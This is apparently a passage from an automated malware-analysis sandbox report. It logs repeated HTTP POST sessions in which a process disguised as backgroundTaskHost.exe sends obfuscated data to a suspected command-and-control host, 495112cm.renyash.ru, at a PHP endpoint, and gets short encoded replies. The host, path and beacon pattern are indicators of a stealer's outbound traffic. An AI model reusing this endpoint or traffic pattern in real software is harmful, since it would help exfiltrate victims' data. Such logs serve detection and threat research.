                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:55.748358965 CET2520OUTData Raw: 54 5b 5e 54 55 52 5f 56 5c 5b 52 58 57 5f 58 5d 58 53 5a 5d 52 5d 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[^TUR_V\[RXW_X]XSZ]R]Q^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*9?48Q2##=,["Z$$!>6R+'^*&3]4=9+;!Y#!Y,2
                                                                                          Jan 4, 2025 11:07:55.848474026 CET  25  IN  HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:56.028518915 CET  804  IN  HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:55 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kgk3GlDJFeX8HwZg39bfgq3IGcQywQReS1YK%2BSNIDI1K%2Bre%2BhxL3TzPhxW75PIKbADkMAO62WCg4RNYsEceDcFpniY9glROsEVevdOONcMoPao3f3ZJ99wgZFw7aPMPZLDF9STQm"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ca5cd0743b7-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3411&min_rtt=1763&rtt_var=3958&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=97658&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          12          192.168.2.4  49753        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:07:56.020870924 CET  317  OUT  POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1832
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:56.373337984 CET  1832               OUT        Data Raw: 51 5a 5e 52 55 5d 5f 56 5c 5b 52 58 57 5a 58 52 58 53 5a 5f 52 52 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ^RU]_V\[RXWZXRXSZ_RRQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.D)*#C )U1U;^=<69[03S4.),'<@?]4%=!Y#!Y,
                                                                                          Jan 4, 2025 11:07:56.496519089 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:56.757910013 CET  958                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:56 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JXd5%2BL8DIU3m%2BukI7EUFHBlFfp0JEmKpfYB6UbEiaU9nLO9zRQgCxPOKHudMG8ycKDrwaTLi%2Fkb6xVauUeRQqis19tZAKd%2BHcaR9jVSqvjLsm6CG5iwF%2FDZUspsWdu0cT1De5OHh"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ca9bc3818f6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7796&min_rtt=1456&rtt_var=13226&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2149&delivery_rate=27982&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 1f 28 2d 24 12 21 01 30 11 29 2d 3d 02 26 20 0d 06 3b 0f 23 5e 20 3f 3c 07 38 0b 3a 02 33 33 34 15 29 3c 3f 0c 23 1e 0d 55 27 20 2a 5d 06 12 3b 06 3f 3f 3e 5b 25 2b 32 52 29 1c 3d 18 27 25 3e 5e 27 03 37 5b 3c 3f 25 5f 26 3c 14 0f 29 01 04 5a 2e 29 24 47 2f 02 3c 51 36 39 21 53 08 13 20 57 25 21 3c 0d 3e 1e 21 12 25 20 21 11 30 03 2c 0d 2a 01 28 16 25 2e 2d 02 2e 0f 2b 5d 2b 23 38 5c 2d 3e 28 15 3e 2d 23 1f 27 2c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$(-$!0)-=& ;#^ ?<8:334)<?#U' *];??>[%+2R)='%>^'7[<?%_&<)Z.)$G/<Q69!S W%!<>!% !0,*(%.-.+]+#8\->(>-#',"\ #V=WL0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          13          192.168.2.4  49754        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:07:56.434451103 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:56.779599905 CET  2516               OUT        Data Raw: 54 5d 5e 50 50 59 5a 52 5c 5b 52 58 57 5a 58 53 58 56 5a 52 52 55 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T]^PPYZR\[RXWZXSXVZRRUQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z->93E"+:%3/=)6103Q!.Q+, <@? ->!Y#!Y,
                                                                                          Jan 4, 2025 11:07:56.905772924 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:57.074405909 CET  813                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:57 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JQlcTulie%2B6ntIUUNEEqtHDXBSumuZhDShfmnUjZmYg%2BY3DVJ06q1PxHWlmIpUpfKrrMmOcFszizkeHmqQj2cAGSbulqijBVp9%2F%2FpbwdG7pGvIKVQmCsPwEA8VF%2BDkwkys%2Bkb%2F3e"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cac5e8e0f7f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=6431&min_rtt=1463&rtt_var=10486&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=35425&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          14          192.168.2.4  49755        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:07:57.223012924 CET  293                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:07:57.576494932 CET  2520               OUT        Data Raw: 54 51 5b 55 50 5c 5f 50 5c 5b 52 58 57 5c 58 5b 58 50 5a 5d 52 5c 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TQ[UP\_P\[RXW\X[XPZ]R\Q_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.D=9"8%#,>-]53>(7)(<++$ 9);!Y#!Y,>
                                                                                          Jan 4, 2025 11:07:57.673707962 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:57.940002918 CET  806                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:57 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fh0%2FrrV9HPkcOuJF3kSs0gE9%2B%2BiZpB0rhdhORYCYDnEhvEU9tEhccR5Bgd8YXsONX70gHv6zQniZGhCclzmq9oSpLQ%2BGhTlS1EEfLNw4wXA7nXclYfFS9GgWHW0GepNTIf3mwo2u"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cb12bf06a5b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3837&min_rtt=1816&rtt_var=4723&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=81169&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          15          192.168.2.4  49757        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:07:58.122347116 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:58.467423916 CET  2520               OUT        Data Raw: 54 59 5b 53 50 5e 5a 57 5c 5b 52 58 57 5d 58 5d 58 5d 5a 5e 52 57 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY[SP^ZW\[RXW]X]X]Z^RWQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)9+D7' ((?*#>=&=+4%< ?'_ );!Y#!Y,
                                                                                          Jan 4, 2025 11:07:58.566174030 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:58.825326920 CET  808                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:58 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CyYOlOXmRHXE302rlXLe3Qx7%2Fgg6CGsahgYbEZClRhUqpcrFA3h93Xsbbgz6YdLw%2BDWB2n%2BSRxpU7AzxNxpg6JLhSd85R6HWqbH1qQttFUoQS3xe5jfwW%2Blx%2Bsa2FAZIZK3t9G4U"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cb6cf530cc6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3415&min_rtt=1629&rtt_var=4183&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=91720&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          16          192.168.2.4  49758        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:07:58.998178005 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:59.342278004 CET  2520               OUT        Data Raw: 51 5c 5e 56 50 5c 5a 51 5c 5b 52 58 57 52 58 5a 58 54 5a 5a 52 51 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\^VP\ZQ\[RXWRXZXTZZRQQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*?48"10'\)%]6=6'-<#V?<?+%$">&Y=!Y#!Y,
                                                                                          Jan 4, 2025 11:07:59.475691080 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:59.738610983 CET  808                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:59 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gqfKjdpTTOlVOWH%2FgfLvJ4QT3cwWsLNxsVwqpgcvFmTcHhAFxnYMGtdkJlY4k8aWLYcMHQDJ9SXGLe78le%2BmDWPtkPWqMNRO9Nl3EH7kiQLOZRS4z%2BTaPVm4LdaH%2BQDgYx%2BkCdPs"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cbc698b43ac-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3830&min_rtt=1745&rtt_var=4826&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=79210&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          17          192.168.2.4  49769        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:07:59.946829081 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:00.295303106 CET  2520               OUT        Data Raw: 51 5c 5e 5f 55 5d 5a 55 5c 5b 52 58 57 58 58 5f 58 57 5a 52 52 54 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\^_U]ZU\[RXWXX_XWZRRTQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*07!U14)9!-['.+R :R),+?04[&)!Y#!Y,.
                                                                                          Jan 4, 2025 11:08:00.414685965 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:00.682635069 CET  807                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:00 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SZre3P4qi07TEZhfRO8CS01Ic5erODLUP8%2F3ZlKLC3n3EVtZw6Gr0PT1EcbUlKm5MiRxI3nftyn0P5W3KJHA8MU4ah9J9FvSB5CfsCsWTPoGyROkghahdlHltf3XJm%2F%2BDxo%2BHQVn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cc24c8e7d0b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3176&min_rtt=1899&rtt_var=3266&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=120491&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          18          192.168.2.4  49775        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:08:00.877168894 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:01.232722044 CET  2520               OUT        Data Raw: 51 59 5e 52 50 58 5a 5c 5c 5b 52 58 57 58 58 5d 58 54 5a 5d 52 51 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^RPXZ\\[RXWXX]XTZ]RQQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.@)#";!&3_*Z1![53#W!.Q(?<0 -&=!Y#!Y,.
                                                                                          Jan 4, 2025 11:08:01.329539061 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:01.587917089 CET  810                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:01 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0PGf%2FdcqqSwvPf3MwfryX0TBEEG5F2ix3URGjz%2FR7Ne5QFLAFNU%2BJEG84O%2BGWMgbhvZW1uN8pPgaE6mQ%2F1%2BOMJT0ERnLMtGPanRpdY6lKkaoJA6iK6UGa5ZrnOMGTrsWtpirPPB"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cc80bc015a3-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3883&min_rtt=1589&rtt_var=5185&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=73201&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          19          192.168.2.4  49781        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:08:01.771512032 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          20 | 192.168.2.4 | 49782 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:01.830960035 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:02.185900927 CET | 2520 | OUT | Data Raw: 51 5c 5b 57 50 59 5a 57 5c 5b 52 58 57 5e 58 5f 58 5d 5a 5f 52 54 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\[WPYZW\[RXW^X_X]Z_RTQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=:0 =W'3/><1![&$X?Q#X)<<#X( 7-9*+!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:02.291271925 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:02.565619946 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:02 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hz1Lzb5o%2FyeuiBO8zcbLfqi%2B%2F%2FFlmVvue64Yj1CxSsg54gh9EpsXnUnudhwsdqStJLAPYEakkHaFBKJu96T0SJcs%2FOlpHHkVe0GMbsk1UlpM5MTEeKmg2GYLX%2FJ6AjMXZOcLuxDV"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cce0ef87271-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3368&min_rtt=1964&rtt_var=3545&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=110597&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


